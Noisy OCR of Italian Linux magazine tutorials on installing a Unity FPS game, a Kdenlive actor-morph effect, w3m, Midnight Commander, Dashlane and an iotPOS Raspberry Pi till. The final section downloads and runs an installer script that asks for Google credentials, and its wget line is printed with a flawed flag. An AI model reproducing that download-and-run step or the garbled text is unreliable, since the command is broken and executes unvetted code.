re SVG. Questo tipo di immagini vet- 
toriali può infatti essere modificato 
con un programma come Inkscape, 
ad esempio per dare colori diversi 
agli oggetti, ottenendo poi un'imma- 
gine PNG ad alta risoluzione. 
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RI Fig. 3 © Il software Dia è la soluzione ideale per realizzare diagrammi di flusso di qualsiasi genere 
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Un futuro 


apocalittico! 


MH Salviamo il pianeta Terra da un’orda di droidi pronti 
a colonizzarlo. Noi siamo gli unici a poterlo fare. Sbrighiamoci! 


Licenza: Free 
Sito Web: http://frostweep.ru 


e la piattaforma di contenuti digitali 

Steam (htip://store.steampoweredì. 

com) permette, attraverso l'omonimo 
client o l’uso della. distribuzione  GNU/ 
Linux. SteamOS (creata ad-hoc. dalla 
stessa software house a stelle e strisce), di 
usufruire di un importante numero di giochi, 
non dobbiamo dimenticare che il nucleo 
del videogioco che permette la grafica in 
tempo reale così come il funzionamento su 
diverse piattaforme, è il motore grafico. In tale 
scenario, l’engine Unity (htips:/unity3d.com) 
si sta rilevando un vero e proprio mattatore. 
Il software di sviluppo è disponibile solo per 
Microsoft Windows e Mac OS X, ma permette 
di creare degli eseguibili per una sterminata 
platea di piattaforme: GNU/Linux, Xbox, 
PlayStation, iPad, iPhone e Android. Nel 
caso in questione, il gioco che vede come 
nucleo il motore Unity è la saga Me and 
PostApocalypse arrivata alla terza serie con 
il rilascio di Me and PostApocalypse Redux 
(per semplicità, MaPARedux) uno sparatutto 
single-player in prima persona (FPS - First 
Person Shooter) sviluppato e pubblicato 
dalla software house indipendente Frostweep 
Games (http:/frostweep.ru) fondata nel 2013 e 
situata in quel di Nikolaev in Ucraina. 


COME SI INSTALLA? 


Del gioco se ne può usufruire utilizzando il 
client della piattaforma ludica Desura (www. 
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Fig.1* Coloriche sfalsano e menu “instabile”: è normale per MaPARedux! 


desura.com) specializzata nell’ospitare titoli 
realizzati da software house indipendenti la 
quale, però, presenta una storia travagliata. 
Originariamente sviluppata da DesuraNET 
venne venduta prima alla. californiana 
Linden Lab (la creatrice di Second Life); 
quindi passò alla Bad Juju Games che 
presentò istanza di fallimento nel 2015, ma 
ad oggi ancora presente. Per questo motivo, 
nel 2016 Desura venne acquisita dalla 
Danese OnePlay la quale, al momento in cui 
scriviamo, vede ilproprio sito bloccato in Italia 


Michele Petrecca 


perché non rispondente ai requisiti dei giochi 
on-line. Al momento, la piattaforma Desura è 
stata parzialmente attivata ma è incompleta. 
Per  l’installazione possiamo. raggirare 
tutte. queste difficoltà seguendo questa 
procedura: puntiamo il browser all'indirizzo 
htips://frosiweep.itch.io e, nella nuova pagina, 
leggiamo le. didascalie delle immagini. 
Noteremo la presenza della seconda serie 
della saga, ma solo per Microsoft Windows. 
Clicchiamo sull'immagine di MaPaRedux 
e successivamente sul pulsante arancione 


Download Now. Verrà aperta una finestra 
pop-up dove si richiede, facoltativamente, 
un piccolo contributo. Decidiamo noi se 
darlo o meno, nel qual caso clicchiamo 
direttamente su No thanks, just take me 
to the downloads. Verremo rediretti in una 
nuova pagina. nella quale scaricheremo 
i file, con un clic sull'icona del Pinguino, 
MaPARedux Linux.zip (163. MB) e 
sharedassets2.zip (451 MB). Entriamo nella 
cartella dove abbiamo salvato i file e iniziamo 
a decomprimere il primo con il comando 
unzip MaPARedux Linux.zip. Copiamo il 
file sharedassets2.zip nel percorso indicato 
(cp. sharedassets2.zip  MaPARedux_ 
Linux/MaPAReudx_Data), entriamo nella 
directory. con cd MaPARedux Linux/ 
.MaPARedux Data e decomprimiamo 
il file precedentemente copiato. (unzip 
sharedassets2.zip). A questo ’ punto, 
forniamo i permessi di esecuzione (chmod 
+x nome file) all'eseguibile compatibile con 
l'architettura del nostro PC, MaPARedux. 
x86 o, per macchine a 64 bit, MaPARedux. 
x86_64. Quindi, lanciamolo. Dopo pochi 
secondi apparirà il menu generale (Fig. 1). 
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Full Screen 


(2 2° IMPOSTAZIONI 
| 01 Dal menu generale di Fig. 
—_—’ 1 clicchiamo su Settings (il 
gioco è localizzato solo in Inglese). 
Spuntiamo la casella Full Screen e 
regoliamo la risoluzione più adatta allo 
schermo in uso con lo slider Screen 
Resolution. Sulla sezione di sinistra 
regoliamo lo slider Music Volume. Per 
il menu a tendina Graphic Quality diamo 
un'occhiata al box Il minimo richiesto. 


IL MINIMO RICHIESTO 


Anche con driver Open Source 


Le risorse necessarie al gioco sono 
abbastanza variabili. Come visibile dal 
Passo 1 del primo tutorial vi sono 4 mo- 
dalità grafiche: Fast, Good, Beautiful e 
Fantastic. Con l'opzione Good attivata 
abbiamo giocato senza alcun problema 
una sessione su un portatile economico 
equipaggiato con 4 GB di memoria RAM 
una CPU AMD E1-6015 dual core da 1,4 
GHz (anno 2015) e con scheda grafica 
Radeon R2 con driver Open Source ra- 
deon. A seconda della scheda in uso, in 
alcuni casi potrebbe essere utilizzato 


LA TRAMA DEL GIOCO 


Nell'anno 2114 un meteorite ha colpito il 
pianeta Terra. La carica batterica ignota 
presente. su di esso ha infettato tutte 
le persone attaccando loro la. peste e 
trasformandole poi in zombie! Ma la 
caduta del meteorite non è stata casuale. 


è CARICAMENTO 

| Clicchiamo su Save per ap- 

— plicare le modifiche, quindi 
su Close. A questo punto possiamo 
cliccare su New Game per lanciare... 
una nuova sessione di gioco. Dopo. 
qualche secondo, necessario al ca- 
ricamento dei dati, partirà un breve 
filmato al termine del quale verremo 
catapultati nella tenebre dell'am- 
biente di gioco. 


anche il modulo Open Source amdgpu 
{per maggiori 


informazioni modin- 
fo nome_ modulo). Qualunque altra 
combinazione di hardware superiore a 
quella indicata non può che migliorare 
l'esperienza di gioco. Da ricordare che il 
driver Open Source per schede NVIDIA 
(modulo nouveau) potrebbe risultare 
per alcune schede meno performante: 
in questi casi si rende necessaria l'in- 
stallazione del driver closed source nvi- 
dia. Lo spazio necessario su hard disk si 
aggira intorno ai 2,2 GB. 


Nasconde un attacco alieno ad opera di 
umanoidi che vogliono colonizzare il nostro 
pianeta. Questo è l’ambiente di gioco 
che ci troveremo a fronteggiare qualora 
decidessimo di giocarci. Noi siamo gli unici 
che possiamo salvare i pochi sopravvissuti 
che si nascondono in appositi bunker 


© AZIONI INIZIALI 
© Ci ritroveremo su una buia 
|’ collinetta. Accendiamo la 
torcia [tasto J} e giriamoci intorno. 
roveremo un piccolo casolare. Di- 


i rigiamoci verso di esso spostandoci 


con i tasti W, A, So D. Vedremo dei 
caricatori, avviciniamoci e quando 
apparirà l'icona di un proiettile pi- 
giamo il tasto F per prenderli. Stessa 
cosa per la dinamite. 


L'INTERFACCIA 

A questo punto non ci resta che 
andare verso il cancello dal 
quale è possibile già intravedere i nostri 
nemici: gli zombie nella foresta. Nell'in- 
terfaccia grafica sono riportati i target da 
ottenere per cambiare di livello, mentre 
in basso lo stato di salute, il tipo di armi 
in uso con il numero di munizioni e cari- 
catori e altre informazioni. 


poiché, per qualche misterioso motivo, la 
nuova peste non attecchisce al nostro corpo. 
In qualche modo ne siamo immuni! Nei passi 
dei tutorial riportiamo le prime azioni da 
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LA FORESTA 

Spegniamo la torcia e entria- 
mo nella foresta. Il numero di 
caricatori è limitato per ogni arma: cer- 
chiamo di utilizzare l'arma più adatta alla 
situazione. | passi da non saltare di volta 
in volta vengono segnalati con una doppia 
freccia e una distanza in metri. | 102 metri 
visibili in figura si riferiscono alla distanza 
che ci separa dall'elicottero militare. 


compiere per poter affrontare il gioco nel 
migliore dei modi: dopo l’azione del terzo 
passo del terzo tutorial si aprirà una nuova 
regione con nuovi obiettivi da raggiungere 
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Proseguiamo nel gioco 


Cambiamo livello e entriamo in una nuova zona 


& 2 i 2a $ i 
q scappa IS 
NO AGLI ZOMBIE! 
Ad una certa distanza lo zombie 
inizierà a venire verso di noi. 
Cerchiamo di annientarlo prima che ci 
raggiunga. In prossimità dell'elicottero non 
seguiamo il sentiero, ma passiamo sotto 
l'albero che lo sostiene quindi ritorniamo 
indietro sul sentiero. Cambiamo arma op- | 
tando per il mitragliatore, avviciniamoci al 
gruppo di zombie e fragghiamoli tutti. 


seguendo la stessa dinamica. Nessuno ci 
vieta di dilettarci anche nelle esplorazioni 
dell'ambiente, ma teniamo sempre in conto I 
il limitato numero di munizioni. 


MAPPA MANCANTE 


Dopo l'elicottero apparirà un 

nuovo target ad una distanza di 
circa 125 metri. Proseguiamo per il sen- 
tiero, facendo attenzione ad uno zombie 
nascosto, e percorriamo il tunnel: appena 
fuori di esso - attenzione allo zombie dal- 
la destra - ci verrà ricordato di utilizzare 
la modalità Stealth. Pigiamo il pulsante Y 
e corriamo [Shift-W]) verso l'elicottero. 
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VELOCI! 

All'interno dell'elicottero c'è uno 

zombie: non ammazziamolo. 
Andiamo prima verso il cockpit. Troveremo 
uno smartphone: interagiamo con esso 
(tasto F). Scatterà un allarme.Lo stealth 
mode [che è a tempo] si sarà disattivato e 
verremo attaccati da dietro dallo zombie 
presente. Fragghiamolo, riattiviamo lo ste- 
alth mode e corriamo verso il tunnel. 


LA DINAMITE 

Rientrati nel tunnel circa a metà 

ci verrà segnalata la presenza di 
dinamite, di preciso due gruppi di candelot- 
ti. Attiviamoli entrambi utilizzando il tasto 
F e corriamo fuori dal tunnel: dopo qualche 
secondo avverrà l'esplosione chiudendo 
il percorso. Ritorniamo vicino il primo eli- 
cottero [quello sopra l'albero) e facciamo 
saltare l'altro candelotto di dinamite. 
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Da una persona 
a... un'altra! n - 


I Cambia magicamente i connotati di un attore, facendogli assumere 
le più strane sembianze: con Kdenlive è un gioco da ragazzi! 


troviamo categorie come horror, fantascienza e, più recente- 

mente, anche fantasy. Gli horror sono ovviamente da sempre i 
più gettonati tra i produttori indipendenti perché richiedono pochissi- 
mi sforzi: un buon horror può essere girato anche con una sola cine- 
presa e con effetti realizzati n camera, senza bisogno di preoccuparsi 
troppo del montaggio e della computer grafica. Nell’ultimo decennio, 
grazie alla comparsa di strumenti Liberi, Open Source e gratuiti per la 
post-produzione digitale dei filmati, anche la fantascienza e il genere 
fantasy hanno preso piede. Tra i vari effetti che è diventato possibile 
realizzare molto facilmente c’è la trasformazione di un attore in un 
altro: nella fantascienza si immaginano spesso dispositivi futuristici 
in grado di modificare i connotati di una persona premendo un pul- 
sante, mentre nel mondo fantasy è piuttosto frequente pensare a una 
pozione magica capace di trasformare le persone. L'esempio più fre- 
quente nella cultura di massa è la “pozione polisucco” della saga di 
Harry Potter, che permette di trasformarsi in altre persone. Realizzare 


T ra i principali film che vengono prodotti in modo amatoriale 


Le clip al loro posto 


un effetto simile con Kdenlive è piuttosto semplice: noi suggeriamo 
un metodo generico, che possiamo poi adattare a diverse esigenze. 
Cominceremo con due riprese degli attori: il primo sarà ovviamente 
l'attore che beve la pozione e che si trasforma nel secondo attore. 
Queste due riprese vanno realizzate con gli attori davanti a un telo 
verde, per poter eseguire poi l’effetto chroma key (Chiave cromati- 
ca) in modo da poter facilmente rimuovere lo sfondo e quindi poter 
spostare gli attori dove necessario nella scena. Ovviamente, poi ser- 
ve una fotografia o una ripresa dello sfondo: su questo sfondo si po- 
tranno posizionare gli attori. L'effetto inse è una semplice dissolvenza 
tra le due clip: prima si deve vedere soltanto il filmato con il primo 
attore e, a un certo punto, deve comparire la clip del secondo attore. 
Non utilizzeremo, però, la classica transizione a dissolvenza di opaci- 
tà. Utilizzeremo invece una dissolvenza personalizzata, che Kdenlive 
chiama Wipe. Sono delle dissolvenze costruite sulla base di apposite 
immagini in scala di grigi: se ne possono creare appositamente, ma 
ce ne sono già tante incluse nel programma. 


Ci servono tre clip su tre diverse tracce: lo sfondo, il primo attore e il secondo attore 
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LA CLIP DI SFONDO 

Cominciamo creando un nuovo progetto in Kdenli- 

ve e posizioniamo la clip di sfondo nella traccia più 
bassa, cioè la Video1. Nel progetto sono poi necessarie le due 
clip degli attori. 
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ECCO I DUE ATTORI 

La clip del primo attore, quello che deve trasformarsi 

nel secondo attore, può essere inserita nella traccia 
Video2, cioè la traccia intermedia. Ovviamente questa clip va ta- 
gliata usando lo strumento Forbici o le apposite manigliette. 
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In particolare, quella che ci interessa fa comparire la seconda 
clip sopra la prima con una serie di macchie che pian pia- 
no diventano sempre più grandi, fino a ottenere il passaggio 
completo .da una clip all’altra. Sfruttando le transizioni e gli 
effetti di Kdenlive potremo allineare i due attori e lo sfondo, 
per creare una immagine verosimile. È fondamentale far coin- 
cidere molto bene i due volti, in particolare gli occhi dei due 
attori devono essere sovrapposti perfettamente. L'attenzione 
degli spettatori sarà infatti rivolta probabilmente proprio verso 
gli occhi e il resto della faccia, durante la trasformazione, per 
cui è importante che questa parte sia ben sovrapposta. Per il 
resto del corpo invece non ci sono particolari problemi, pro- 
prio perché l’attenzione del pubblico è sempre rivolta verso la 
faccia degli attori. Come sempre, possiamo dare un'occhiata 
ad un video d'esempio: www.edmaster.it/url/7179. 


MI Fig. 1 © Il primo attore si trasformerà nel secondo 


Eliminiamo il telo verde // 


Le due SAI degli a allora devono ‘avere lo sfondo trasparente: useremo la chiave cromatica | 
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COMPOSIZIONE 
0’ ‘|. L'ultima clip, quella del secondo attore, va mes- 
.’ sa nella traccia più alta, la Video3, allineandola 
in modo che si sovrapponga in parte alla clip del primo at- 
tore. Aggiungiamo al clip della traccia Video2 una dissol- 
venza di tipo Composito verso la Video1. 
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ROTOSCOPING 

Per rifinire i bordi, aggiungiamo anche un ef- 

fetto di tipo Rotoscoping, disegnando sul Mo- 
nitor Progetto il contorno dell'area in cui è presente 
l'attore, con operazione Minimum. Così eventuali bordi 
del telo dovrebbero sparire. 
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IL CHROMA KEY 

0 # Ala clip del primo attore va rimosso lo sfondo: 
i. possiamo farlo con l’effetto Chiave cromatica. 
Basta selezionare il colore del telo verde e la varianza 
adeguata. Se ci sono più sfumature di colore, si possono 
aggiungere più effetti uno dopo l'altro. 
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UNA TRANSIZIONE 
04 Cominciamo a lavorare, ora, sulla traccia Video3, 
«»_°‘’che contiene la clip del secondo attore. Impostia- 
mo per questa traccia una transizione che vada dall'inizio 
di questa clip alla fine della clip del primo attore. Il tipo di 
transizione è poco importante, Composito per ora va bene. 


| 


ANCHE SENZA LO SFONDO VERDE 


Naturalmente, l’effetto si può realizzare anche senza il chroma 
key, riprendendo direttamente i due attori nello stesso punto del- 
la stanza. Il problema è che, come dicevamo, la faccia dei due at- 
tori deve trovarsi nello stesso posto: bisogna quindi stare attenti 
non soltanto a non spostare la cinepresa tra le due riprese, ma 
anche a far coincidere perfettamente la posizione degli attori (ci 
si può aiutare facendo un segno sul pavimento per indicare loro 
dove debbano mettersi esattamente). Il vantaggio di non utilizza- 
re il telo verde è che la luminosità rimane certamente sempre la 
stessa e gli attori risultano molto ben inseriti nella scena (perché 
lo sono davvero). Il problema può presentarsi quando lo sfondo 
che vogliamo avere contiene oggetti in movimento. 


MI Fig. 2 © L'effetto in corso: l’attore si sta trasformando 
gradualmente 


La transizione che vogliamo 


Per il nostro effetto serve una particolare transizione a forma di “nuvole” 
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ALTRO CHROMA KEY 

Anche dalla clip del secondo attore deve essere 

rimosso lo sfondo, usando gli effetti Chiave cro- 
matica e Rotoscoping, esattamente come abbiamo fatto 
per la clip del primo attore. | due attori appariranno forse 
non ben sovrapposti, ma per ora nonimporta. + 
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L'ALLINEAMENTO 

È necessario allineare quanto meglio possibi- 

le le clip: aggiungiamo alla clip del secondo 
attore l'effetto Position and zoom, traslandolo in modo 
che almeno la faccia (occhi, naso, bocca) sia perfetta- 
mente allineata con quella del primo attore. 
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TRANSIZIONE WIPE 

Ora lavoriamo sulla transizione che permette 

di sovrapporre le clip della traccia Video3 e Vi- 
deo2: impostiamola come Wipe invece di Composito. Il 
Wipe method deve essere cloud, e la morbidezza circa 
10. Nessuna casella va spuntata. 
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Per continuare la sovrapposizione anche dopo 
la particolare dissolvenza, aggiungiamò una 
transizione di tipo Composito per la traccia Video3 riferita 
alla Video1, che deve durare dal termine della clip della 
traccia Video2 al termine della clip della traccia Video3. 
nera 
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Rifiniamo la transizione 


Sistemando alcuni dettagli possiamo rendere l’effetto più credibile 
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A questo punto, andiamo a lavorare sulla tran- 

sizione Composito della traccia Video2. Posizio- 
nandoci poco prima della fine della clip, possiamo quindi 
aggiungere un nuovo fotogramma chiave con l'apposito 
pulsante aggiungi (+). 
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Aggiungiamo alla clip del primo attore l'effetto Opera- 

zione sul canale alpha. Scegliamo come operazione 
Shrink soft, impostando i due valori numeri nel modo che ci sem- 
bra dare l’effetto più realistico. 
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LUCE E CONTRASTO 

Possiamo ora eseguire delle piccole correzioni di 

colore, assegnando alle clip l'effetto Curve e di- 
segnando una curva sul canale Luma. Piccolo consiglio: è 
importante è che tutte le clip del progetto sembrino avere 
la stessa luminosità. 


ecco 
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UNA DISSOLVENZA 
Spostandoci alla fine della clip, aggiungiamo un 
ulteriore fotogramma chiave, e in questo impo- 
stiamo l'opacità a 0. Dovremmo quindi ottenere la scom- 
parsa per dissolvenza del primo attore: questo ci aiuta se 
i due attori non sono ben sovrapposti. 
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UNA RIDUZIONE 
0 Facciamo la stessa cosa anche alla clip del secon- 


do attore: effetto Operazione sul canale alpha, 
selezionando Shrink soft. Questo ci permette di fondere 
meglio gli attori con lo sfondo e tra di loro. 
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EFFETTO SONORO 

Per rendere meglio l'effetto si possono aggiunge- 
re dei suoni. Se ne possono trovare su Freesound 
cliccando sul menu Project/Risorse sulla rete. La clip au- 
dio importata va inserita nella traccia Audio1 e allineata al 
momento in cui avviene la trasformazione. 
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Achinon è capitato? È Comeai bei vecchi 
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e perché accade 


“0 NAVIGO 
DAL TERMINALE!” 


Sei alla ricerca di un modo alternativo e originale 
per navigare sul Web? W3M è il software che fa al caso tuo! 


avigare in Rete è una delle attività più comu- 

ni. Quando si lavora in un ambiente grafico è 
possibile usare diversi browser, i più famosi sono 
certamente Mozilla Firefox e Google Chrome. Ma 
se si sta lavorando da terminale, magari mentre si fa 
la manutenzione di un server, e non si dispone di un 
ambiente grafico? In questi casi possiamo affidarci 
a w3m, un browser Web che funziona ad interfac- 
cia di testo. Il browser w3m, offre diverse opzioni 
utili per sviluppatori e scrapers. Per fare un esem- 


luca : sudo — Konsole 


File Miodifica Visualizza Segnalibri Impostazioni Aiuto 


Servono i pacchetti w3m e w3m-img. Il secondo per- 

mette la visualizzazione di immagini. Il programma può 
poi essere aperto fornendogli almeno un indirizzo da cui partire. Ad 
esempio, con il comando w3m google.it si visualizza Google. 


pio, w3m consente la ricerca all'interno della pagine 
Web con le RegEx, quindi chi sa come utilizzarle 
può eseguire ricerche anche molto complesse. Ed in 
più, quasi superfluo sottolineare che, rispetto ad un 
comune browser con interfaccia grafica, è w3m è 
decisamente più leggero e ci consente di visualizza- 
re le pagine Web senza tanti inutili fronzoli (conte- 
nuti in Flash e banner pubblicitari primi fra tutti). Se 
siamo curiosi di metterlo alla prova, cos'altro aspet- 
tiamo? Installiamolo subito! 


\l 


Se siamo in un ambiente che riconosce il mouse, clic- 

chiamo su un qualsiasi punto della pagina Web per ve- 
dere un menu con le opzioni principali. Se non si usa il mouse è 
possibile spostarsi nella pagina con le frecce direzionali. 


Con il cursore su una casella di testo, premiamo Invio e 

cominciamo a scrivere. Per confermare basta premere 
Invio. Nel caso della ricerca di Google, naturalmente, dobbiamo poi 
spostare il cursore sul pulsante [Cerca] e premere Invio. 


Cri 
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Ci sono anche delle opzioni utili per i programmatori, e 

in generale per chiunque voglia fare scraping. Premen- 
do L, vedremo un elenco di tutti i link e le immagini presenti nella 
pagina; con v possiamo visualizzare il codice sorgente. 


ESPLORIAMO IL FILE SYSTEM 


Midnight Commander è il file manager che ti aiuta a muoverti più facilmente 
nella shell di GNU/Linux. Ecco come usarlo 


hi lavora spesso con il terminale si trova fa- 

cilmente a dover scorrere il file system alla 
ricerca di vari file da modificare o visualizzare. 
In un ambiente grafico esistono ovviamente i 
file manager come Dolphin e Nautilus, che per- 
mettono di controllare i file in modo semplice. 
In un terminale il metodo più rapido è rappre- 


luca: me — Konsole 


File. Modifica Visualizza Impostazioni 


pui OT Ipssdratset is 2016 


sentato dai comandi Is e cd, rispettivamente, per 
leggere il contenuto di una cartella ed entrare 
in un'altra directory. Ma possono essere molto 
scomodi, se non si sa già bene dove cercare e 
soprattutto se si devono visualizzare molte di- 
rectory. Ma per fortuna esiste Midnight Com- 
mander, per gli amici MC, un file manager per 


Aiuto è 


terminale basato su Ncurses, che offre un'inter- 
faccia simile a quella di un programma grafi- 
co ma all'interno di una normale shell Bash. Il 
programma ha molte opzioni, che uniscono la 
comodità di un'interfaccia grafica alla potenza 
della shell, ottenendo un buon compromesso. 
Scopriamo come utilizzarlo. 


Per avviare Midnight Commander basta lanciare da 
terminale il comando mc: si ottiene una vista su due 
schede appaiate. Per passare dalla scheda sinistra a quella di de- 
stra basta usare il tasto Tab. Ci si può spostare tra i vari file usando 


le frecce direzionali ed il tasto Invio. 


selezione. 


Su MC è possibile selezionare (o deselezionare) 
dei file semplicemente passandoci sopra con le 
frecce e premendo il tasto Ins. Premendo + selezioniamo i 
file. Con \, invece, li deselezioniamo e con * invertiamo la 


Premiamo Alt+? per visualizzare la finestra di ricerca. 
La ricerca può essere molto approfondita: possiamo 
specificare la cartella di partenza e usare opzioni per cercare sia 


nel nome dei file che nel loro contenuto. 


Lal 
Il file manager offre poi una serie di altri comandi molto 


utili. Ad esempio, con Ctrl+Spazio viene mostrata la di- 
mensione della cartella selezionata e con Ctrl+x c possiamo aprire 
una finestra per impostare i permessi di un file (come chmod). 
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PASSWORD 
SEMPRE 
AL SICURO! 


Dashlane è un software specializzato nella memorizzazione 
sicura di chiavi di accesso, appunti privati e carte di credito. 
Ecco come installarlo anche sulla tua distro preferita 


BS Twitter, email, forum vari, servizi di certo una buona prassi: a un pirata basterebbe sco- sword diverse? Se non riusciamo a ricordarle tutte, 
cloud storage... sono questi i servizi ai qua- vare la nostra unica “master password” per rubare in evitiamo di annotarle su carta e affidiamoci a sof- 
li ognuno di noi accede quotidianamente. C'è chi un solo colpo la nostra identità sui social network, tware specializzati. Uno di questi è Dashline, dispo- 
utilizza la stessa password di accesso per qualsiasi per accedere alla nostra mailbox o al nostro conto  nibile anche su GNU/Linux e che si installa come 
sito Web che richiede una registrazione ma non è di bancario. Ma come fare a ricordare tantissime pas- una comune estensione del browser. 


( Scaricare Dashlane|D. x 


@ dashlane 


«| Od @ Dashtaneinc (uS}| httys://www.dashlane 


www.dashlane,com 


Firefox ha impedito a questo sito di richiedere 
l'installazione di software sut computer. 


Non consentire 


Non dimenticare più le 
password 


Dal browser che preferiamo (ad esempio Mozilla Fire- 4 Nella r nuova pagina La appare clicchiamo su Consenti: 


fo) raggiungiamo la pagina Web www.dashlane.com. Mozilla Firefox, infatti, per impostazione predefinita disa- 
Da qui clicchiamo sul pulsante Scarica Dashlane (in alto a destra bilita l installazione automatica di estensioni. Ciò, essenzialmente per 
della pagina) per procedere al download dell'estensione. motivi di sicurezza [sul Web circolano diverse estensioni fraudolente]. 


{xi td PINI * 
(9, MISTOUALE RASARA Inizia a usare Dashlane gratuitamente 
LI 


Richiede il permesso di: 


Questa è l'ultima password che dovrai ricordare! 

* Accedere ai dati dei siti web 

e Scambiare messaggi con programmi diversi da 
Firefox 

* Monitorare l'utilizzo delle estensioni e gestire i temi 

* Leggere e modificare le impostazioni relative alla 
privacy 

* Accedere alia schede del browser 

* Salvare dati sul client senza limitazioni di spazio 


Email 


v.cosentinottedmaster.it 


Password 


7 Desidero ni 


"e emati con consigli utili e offerte speciali 


PAGUOGUUTI i 


Fatto ciò, non dobbiamo far altro che cliccare sul pul- 17 84 Al termine, verremo reindirizzati alla pagina di regi- 


sante Installa (leggiamo tutte le autorizzazioni neces- > strazione (o login, nel caso disponiamo già di un ac- 
sarie). Attendiamo quindi la fine del setup che dura giusto una count). Indichiamo la nostra Email e una Password per accedere 
manciata di secondi (dopotutto, è solo un'estensione). ai nostri dati più importanti. Terminiamo con Crea il mio account. 
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Password, appunti e carte di credito sotto chiave 


Muoviamo i primi passi in Dashlane e salviamo ciò che riteniamo più importante 


) Firefox Browser Web © CIC: 


e - Mozilla Firefox 
KA Dashlane 


€07 Estensione (Dashtane): moz-extensione//offaft2b-1699-4941-b0! e (Re 
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AVVIO DI DASHLANE 
0 1 Se abbiamo installato Dashlane su Mozilla Firefox, 
clicchiamo sulla sua icona presente accanto alla barra 
degli indirizzi per avviarlo. A questo punto, siamo pronti per memo- 
rizzare le nostre credenziali più importanti o le note da tenere sotto 
chiave. Clicchiamo su Aggiungi. 


dùa0b$naO 


Mome A 
[wi twitter.com 2000 Non presente Non utilizzata 


ilamali - Vincenzo Cosentino IIOVOONIAN Non presente Non utilizzata È 


LI DI ST 


TUTTO SALVATO! 
Ritorniamo all'interfaccia grafica principale di 
Dashlane. Qui vengono elencati tutti i siti Web per 


i quali abbiamo memorizzato delle credenziali di accesso. Per 


accedere più rapidamente, possiamo cliccare sull'icona Vai al 
sito presente nella rispettiva riga. 


1) di Estensione {Dashlane); moz:extension://0ffdff2b-269b-4941-b iQ Cerca fù si 


, 
Carta di credito 


Vincenzo Cosentino 


123412412341234 
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CARTE DI CREDITO 
05 Possiamo memorizzare anche i dati delle nostré carte 
di credito o debito. Per farlo, dal menu principale, clic- 
chiamo su Pagamenti. Diamo un nome alla carta da aggiungere e 
compiliamo tutti i campi presenti (Numero di carta, Codice di sicu- 
rezza, ecc). Terminiamo con OK. 


Aggiungi una password 


https://www.facebook.com 
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}$,0.9,0,9,0,0,0,0,0,4 


NUOVO ACCESSO 
02 Compiliamo il campo Sito Web con l'indirizzo del ser- 
vizio di cui vogliamo memorizzare le credenziali (ad 
esempio, Facebook). Indichiamo in Login la username ed anche la 
Password. Se vogliamo, compiliamo anche Nome e Categoria. Ter- 
miniamo con un clic sul pulsante OK. 


<«. GIdk Estensione (Dashlane)| moz-extension://offdff2b-a69b-4941-b01 cua #o sù 


Nota privata 


contenuto della nota 


APPUNTI SICURI 
04 Come già detto, Dashlane memorizza non solo pas- 
sword ma anche note da proteggere. Spostiamoci 
nel menu principale dell'estensione (icona ad hamburger in 
alto a sinistra) e clicchiamo su Appunti sicuri. Clicchiamo su 
Aggiungi, compiliamo la nota e salviamo con OK. 


Dashlane - Mozilla Firefox 


 Dashlane 


€ astensione (Dashlane) | moz-extension://offdff2b-a69b-4941-b: e (a tf òw 
< Gestisci Dif 
Nome a ogin ategoria 
NA twitter.com XK Non presente 
ES Vincenzo Cosentino IOKIIIIAM Non presente 


DATI SINCRONIZZATI 

Dal menu Impostazioni (presente in basso a sinistra) 

clicchiamo su Gestisci Dispositivi: da qui possiamo ve- 
dere tutti i dispositivi sui quali abbiamo installato Dashlane. Le pas- 
sword memorizzate sui vari device o PC vengono sincronizzate in 
modo da averle sempre disponibili ovunque. 
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Il registratore di 


Si chiama loTPOS ed è il software progettato per Raspberry Pi che ti consente 
di dare un tocco di classe e innovazione alla tua attività commerciale. 


Ecco come installarlo e configurarlo 


ettere in piedi una nuova attività imprenditoriale 

può essere complicato, non solo per la burocrazia 

necessaria per intraprendere una nuova avventura, 
ma anche per gestire le vendite e gli incassi. Il registratore 
di cassa è uno strumento fondamentale, ma spesso costoso 
e poco pratico da utilizzare. Per semplificare la vita dei 
commercianti e per ridurre i loro costi esiste iotPOS: si tratta 
di un programma progettato appositamente per i Rasperry Pi 
(qualsiasi modello in circolazione, dal più “vecchio” 1 al più 
recente 3), i mini computer dal basso costo d’acquisto (meno di 
50 euro) e dall’altrettanto irrisorio consumo energetico (aspetto, 
questo, da non sottovalutare quando si avvia una nuova attività 
commerciale). Grazie ad un Raspberry Pi ed al software iotPOS 
possiamo quindi realizzare un proprio registratore di cassa 
moderno e funzionale, che non ha nulla da invidiare ai modelli 
più “commerciali” (e spesso closed) in circolazione. Anzi, sono 
questi ultimi a dover invidiare qualcosa a iotPOS. 


COSA OFFRE IOTPOS? 


Il software non solo aiuta aiuta il commerciante permettendogli 
di fare un inventario e di ottenere immediatamente le statistiche 
sulla merce venduta, ma offre anche la possibilità di realizzare 
delle casse automatiche, nelle quali i clienti possano scansionare 
gli articoli ed ottenere il conto da pagare. Una funzionalità già 
utilizzata in diversi ristoranti, così come in diverse attività 
commerciali fuori dall’Italia (nel Regno Unito, ad esempio, 
molti supermarket offrono casse automatiche che riducono al 
minimo le lunghe file alle casse alle quali, purtroppo, in Italia 
siamo abituati). Questo programma risulta particolarmente 
utile se abbinato ai moderni lettori di carte di credito a basse 
commissioni, che permettono ormai a qualsiasi commerciante 
di accettare pagamenti tramite carte di credito, di debito, o 
addirittura account PayPal senza dover pagare commissioni 
enormi. Soprattutto perché essendo calcolate in percentuale è 
possibile fare pagamenti anche di pochi centesimi. 

Uno di questi servizi/dispositivi è, ad esempio, SumUp (Aitps:// 
sumup.it/). 
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@Fig.1 e Corredato di una stampante termica, il software loTPOS 
si dimostra come una soluzione professionale ed innovativa in 
concorrenza con tutti i “classici” registratori di cassa 


INSTALLIAMO IL NECESSARIO 


Installare IOTPOS su un Raspberry Pi richiede alcuni passaggi 
per nulla complicati. In particolare, è necessario compilare il 
software e configurare il sistema affinché tutto possa funzionare 
al meglio. Per facilitare il processo di installazione, abbiamo 
deciso di realizzare uno script che automatizza il processo di 
automazione. Per lanciarlo, basta accedere al terminale del 
sistema operativo installato sul nostro Raspberry Pi (ad esempio 
Raspbian) e da qui lanciare i seguenti comandi: 


wget -o iotPOS install.sh http://www.edmaster.it/url/7178 
dos2unix iotPOS install.sh 

chmod +x iotPOS install.sh 

./iotPOS_install.sh 
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® Fig. 2 * Ecco lo schema di collegamento 
del Raspberry Pi con gli altri componenti 


Lo script richiede soltanto di inserire le credenziali del proprio 
Google Account. Più nel dettaglio, questo dato è fondamentale 
per consentire ad IoTPOS di utilizzare GMail, in modo da poter 
utilizzare l’invio di email. Ovviamente il Raspberry Pi deve essere 
